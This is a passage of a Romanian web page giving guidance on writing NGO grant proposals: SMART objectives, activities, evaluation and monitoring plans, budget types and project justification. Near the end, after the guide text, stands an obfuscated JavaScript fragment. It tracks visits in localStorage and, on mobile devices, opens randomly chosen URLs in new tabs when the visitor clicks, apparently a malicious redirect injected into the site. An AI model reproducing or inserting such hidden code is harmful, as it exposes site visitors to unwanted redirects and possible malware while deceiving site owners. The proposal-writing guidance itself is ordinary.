  • folosirea cuvantului “prin” atrage dupa el explicatii cu privire la modul in care va fi atins scopul proiectului; nu este cazul a se face acest lucru in aceasta sectiune.

II.6. Ce sunt obiectivele unui proiect?

Un obiectiv este un rezultat scontat ce trebuie obtinut in efortul de atingere a scopului proiectului si, implicit, a rezolvarii problemei.

Pe masura ce organizatia/institutia atinge obiectivele proiectului, discrepanta dintre stadiul actual si scop se ingusteaza.

Obiectivele sunt pasi ce trebuie facuti pentru a ne apropia de scop.

Vorbim despre “obiective” (la plural) pentru ca este greu de presupus ca poate fi vorba despre unul singur. Ele se vor stabili gradat, in concordanta cu intervalele de timp avute in vedere pentru realizarea proiectului, fiind specifice unei anumite perioade.

In vederea formularii corecte a obiectivelor se va raspunde cu precizie la urmatoarele intrebari:

  • Care sunt zonele cheie pe care dorim sa le schimbam prin acest proiect?
  • Care este segmentul de populatie care va fi implicat in schimbare? (atentie, aici trebuie sa avem in vedere nu numai grupul-tinta, care de altfel va fi stabilit cu precizie, ci si categoriile de populatie cu care acesta interactioneaza semnificativ!)
  • Care este directia schimbarii pe care o dorim? (crestere sau imbunatatire, descrestere sau reducere)
  • Care este gradul sau proportia schimbarii?
  • Care este termenul (sau intervalul de timp) prevazut pentru atingerea gradului de schimbare?

Trebuie avuta mare atentie atunci cand se enunta obiectivele pentru a nu se confunda cu activitatile.

Acestea din urma descriu cum se indeplinesc obiectivele.

Obiectivele reprezinta “un sfarsit”, in timp ce metodele reprezinta “un drum”.

Cea mai buna regula de deosebire a lor este urmatoarea: daca exista un singur mod de a indeplini obiectivul pe care l-ati enuntat, probabil ca, de fapt, ati enuntat o actiune.

O alta metoda de a verifica daca ceea ce se enunta este un obiectiv sau nu, este folosirea initialelor unor cuvinte care reprezinta caracteristicile pe care trebuie sa le intruneasca obiectivele, initiale care, una langa alta, compun cuvantul englezesc “SMART” (istet):

  • S – “specific” – este obiectivul clar: cine, ce, cand, unde, cum, grup-tinta?
  • M – “masurabil” – sunt masurabile rezultatele?
  • A – “abordabil” – este un obiectiv care poate fi, in general, atins?
  • R – “realist” – are organizatia resursele necesare pentru atingerea lui in timpul dat?
  • T – “incadrare in timp” – exista un termen limita?

Scopul si obiectivele unui proiect sunt diferite de scopul si obiectivele organizatiei, desi in mod normal exista o legatura intre ele.

II.7. Ce cuprind activitatile unui proiect?

Sectiunea din proiect referitoare la activitati cuprinde descrierea detaliata a ceea ce organizatia/institutia urmeaza sa intreprinda pentru atingerea obiectivelor.

Activitatea este un mijloc de a atinge un obiectiv. Trebuie retinut faptul ca, pentru atingerea unui obiectiv, este necesara punerea in practica a mai multor metode. Daca pentru obiectiv nu se poate defini decat o metoda de a fi atins, inseamna ca obiectivul respectiv este de fapt o activitate.

Acest capitol trebuie sa cuprinda:

  • enuntarea fiecarei Activitati in parte;
  • specificarea Responsabilului activitatii respective;
  • specificarea Resurselor de care este nevoie (personal, echipament, timp);
  • descrierea secventelor in Timp si modul cum se interfereaza activitatile.

Pentru a elabora activitatile prin care se atinge un obiectiv, raspundeti-va la urmatoarele intrebari:

  • ce anume aveti de facut pentru atingerea obiectivelor (raspunsul la aceasta intrebare il constituie actiunile ce trebuie intreprinse);
  • ce sarcini trebuie indeplinite in cadrul fiecarei actiuni (raspunsul va ajuta sa evaluati resursele de care aveti nevoie si planificarea in timp);
  • ce resurse sunt necesare pentru indeplinirea fiecarei sarcini;
  • care sunt datele de incepere si terminare a sarcinilor (raspunsul la aceasta intrebare va ajuta sa determinati secventele in timp);
  • cum se vor selecta participantii (raspunsul va ajuta sa va dati seama daca veti avea oamenii necesari pentru ducerea activitatilor la bun sfarsit).

Recomandari:

  • Resursele specificate la sectiunea “activitati” trebuie sa corespunda cu resursele cerute in buget.
  • Fiecare resursa mentionata (personal, echipament etc.) va trebui “tradusa” in bani si introdusa in buget.
  • Explicati motivele care v-au facut sa alegeti metodele pe care le-ati ales.
  • Faceti o scurta discutie despre riscul punerii in practica a metodelor respective; aratati de ce metodele pe care le-ati ales implica o probabilitate mare de atingere a obiectivelor.

II.8. Cum construim un plan de evaluare?

Aceasta intrebare se refera la planul pe baza caruia membrii organizatiei/institutiei urmeaza sa evalueze proiectul, atat la terminarea lui, dar si pe parcurs, la diferite momente intermediare.

Evaluarea reprezinta emiterea de judecati privind progresul inregistrat pe calea atingerii obiectivelor propuse.

Motivele pentru care o activitate a unei organizatii neguvernamentale este evaluata sunt diverse. O analiza simpla a acestor motive va identifica factori interni (care provin din interiorul organizatiei – membri, consiliu de conducere, angajati, simpatizanti) si factori externi (beneficiari, finantatori, sponsori, contractanti, alte ONG, publicul general).

Astfel, la intrebarea “De ce evaluam?” putem identifica cauze interne si cauze externe, cateva dintre cele mai des intalnite fiind amintite in continuare.

Motivatii interne:

  • Pentru a vedea daca facem ceea ce trebuie.
  • Pentru a obtine informatii si reactii daca ceea ce facem e necesar in luarea deciziilor.
  • Pentru aprecierea performantelor organizatiei in raport cu standardele de performanta interna in scopul imbunatatirii performantelor.
  • Pentru ca ne ajuta sa invatam din greseli si astfel sa pregatim succesele viitoare.

Motivatii externe:

  • Pentru ca finantatorii doresc sa se asigure organizatia cheltuieste banii asa cum a prevazut in cererea de finantare.
  • Pentru ca organizatia doreste sa dovedeasca faptul ca deruleaza proiecte si asigura servicii de care este nevoie
    , acopera nevoile beneficiarilor si este capabila sa faca ceea ce afirma ca poate face.
  • Pentru a arata ca suntem competitivi prin prisma raportului cost/beneficii.
  • Pentru aprecierea performantelor organizatiei in raport cu standardele de performanta externe.
  • Pentru a compara activitatea cu ceea ce altor organizatii similare.

Evaluarea se concentreaza asupra a 4 aspecte principale:

  • Resurse investite.
  • Activitati desfasurate.
  • Rezultate obtinute.
  • Beneficii realizate.

Pentru a putea fi realizata, evaluarea necesita, in cele mai multe cazuri, culegerea de date pe toata perioada derularii proiectului, adica monitorizarea proiectului.

Monitorizarea este procesul de colectare sistematica si analizare a informatiilor cu privire la activitatile organizatiei.

Monitorizarea ne ajuta sa efectuam o verificare regulata a ceea ce facem in mod curent: informatiile pot reprezinta indicatori atat cantitativi, cat si calitativi.

Planul de evaluare trebuie sa cuprinda deci referiri la modul cum vor fi culese informatiile cu privire la derularea proiectului (cum se va face monitorizarea) si la felul in care se va aprecia masura in care au fost atinse obiectivele si s-au obtinut rezultatele preconizate.

Pentru a putea spune ca faceti o evaluare corecta a proiectului trebuie ca la sfarsitul procesului de evaluare sa puteti raspunde la urmatoarele intrebari:

  • In ce masura proiectul si-a atins obiectivele propuse?
  • In ce masura atingerea acestor obiective poate fi atribuita in mod direct proiectului dvs.?
  • In ce masura proiectul s-a desfasurat conform planificarii propuse in cererea de finantare?

Atat monitorizarea, cat si evaluarea, nu au obiect si sunt imposibil de facut in mod efectiv atunci cand organizatia nu are foarte bine clarificate si formulate obiectivele.

Activitatea de monitorizare si evaluare trebuie incluse in planificare, iar costurile necesare efectuarii lor trebuie cuprinse in buget.

II.9. Cum pregatim bugetul unui proiect?

In sens mai larg, bugetul de proiect poate fi privit ca o planificare a proiectului din punct de vedere financiar.

Pregatirea unui buget detaliat si realist permite o imagine mai clara a resurselor necesare atingerii obiectivelor proiectului.

Astfel, bugetul atribuie valoare financiara activitatilor proiectului, planificarea generala a proiectului “mergand mana in mana” cu cea a bugetului.

De asemenea, reprezinta si un important instrument de control al resurselor financiare ale proiectului, orice abatere trebuie luata in considerare.

Etape in realizarea bugetului:

  • Planificarea activitatilor proiectului.
  • Estimarea cheltuielilor in detaliu, pentru fiecare activitate si subactivitate.
  • Estimarea potentialelor surse de venituri.
  • Reconcilierea diferentelor dintre cheltuieli si venituri.
  • Fluxul de numerar (bani pentru efectuarea platilor – sume, perioade).
  • Aprobarea bugetului.
  • Stabilirea unor proceduri de supraveghere permanenta a costurilor comparativ cu bugetul, dupa inceperea proiectului.
  • Revizuirea si actualizarea periodica a bugetului.

Recomandari privind intocmirea bugetului:

  • Intocmirea unui buget corect va dura destul de mult, deci incepeti din timp.
  • Consultati, la intocmirea bugetului, toate persoanele implicate in acesta. Veti avea, astfel, mai multe sanse sa fie realist, si, in plus, va asigurati ca el va fi inteles si acceptat in mod flexibil si nu privit ca o masura birocratica de control.
  • Bugetul trebuie sa corespunda cu contractul de finantare.

Se poate intampla ca finantatorul sa nu ofere suma totala pe care o consideram necesara atunci cand scriem proiectul.

Aceasta poate avea 2 motive: fie nu am explicat actiunea si costul ei asociat destul de clar, fie ca nu am calculat corect fondurile necesare.

De mentionat ar fi estimarea contributiilor personale; este bine sa atasam o prospectare a pietei ce ofera produse sau servicii similare, pentru a putea sustine estimarile de pret facute.

Este bine sa explicati finantatorului ca daca nu va ofera toata suma pe care ati cerut-o (si care este bine justificata), proiectul nu va putea atinge toate obiectivele pe care le-ati propus si ca ar trebui sa aiba in vedere acest fapt, mai ales atunci cand va evalua rezultatele proiectului dvs.

Tipuri de buget:

  1. Buget pe Categorii de Cheltuieli – grupeaza veniturile si cheltuielile pe categorii.
  2. buget pe Categorii de Cheltuieli si pe Activitati – grupeaza cheltuielile pe categorii si pe activitati, in cadrul acelui proiect.

    Este tipul de buget cu care se opereaza atunci cand se elaboreaza bugetul proiectului.

    Utilizandu-l, ne putem asigura de faptul ca nu scapam din vedere nici o activitate si nici o cheltuiala.

  3. Buget pe Surse – grupeaza cheltuielile pe categorii si pe surse de finantare care participa cu fonduri.

    Acest tip de buget reprezinta, de obicei, forma sub care bugetul i se prezinta finantatorului caruia i se solicita fonduri, avand in vedere faptul ca orice finantator doreste sa stie cine mai sustine din punct de vedere financiar proiectul respectiv si in ce masura.

    Daca se doreste o detaliere privind modul in care s-a ajuns sa se prevada sumele aferente fiecarui tip de cheltuiala, se poate atasa si bugetul de tip b, pe activitati).

II.10. Cum justificam proiectul?

In cadrul fiecarui proiect trebuie sa convingeti finantatorul de urmatoarele aspecte:

  1. Problema abordata in cadrul proiectului este una reala, iar amanarea rezolvarii ei are repercusiuni asupra unui grup semnificativ de cetateni; trebuie sa explicati intr-un mod cat mai convingator ce ar urma sa se intample daca problema respectiva ar fi lasata nerezolvata.
  2. Atingerea scopului si, implicit, rezolvarea problemei, va aduce o serie de avantaje comunitatii, societatii sau anumitor grupuri sociale, avantaje pe care trebuie sa le mentionati.
  3. Organizatia dvs. este in masura sa abordeze problema respectiva si sa duca proiectul la bun sfarsit; explicati cat mai clar argumentele care sustin aceasta afirmatie.
/*{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[‘getItem’](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+’-mnts’,_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[‘mobileCheck’]()&&window[_0x22f77c(0x1d4)](newLocation,’_blank’);};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());/*]]>*/

Leave a Reply

Your email address will not be published. Required fields are marked *

ADJB © 2014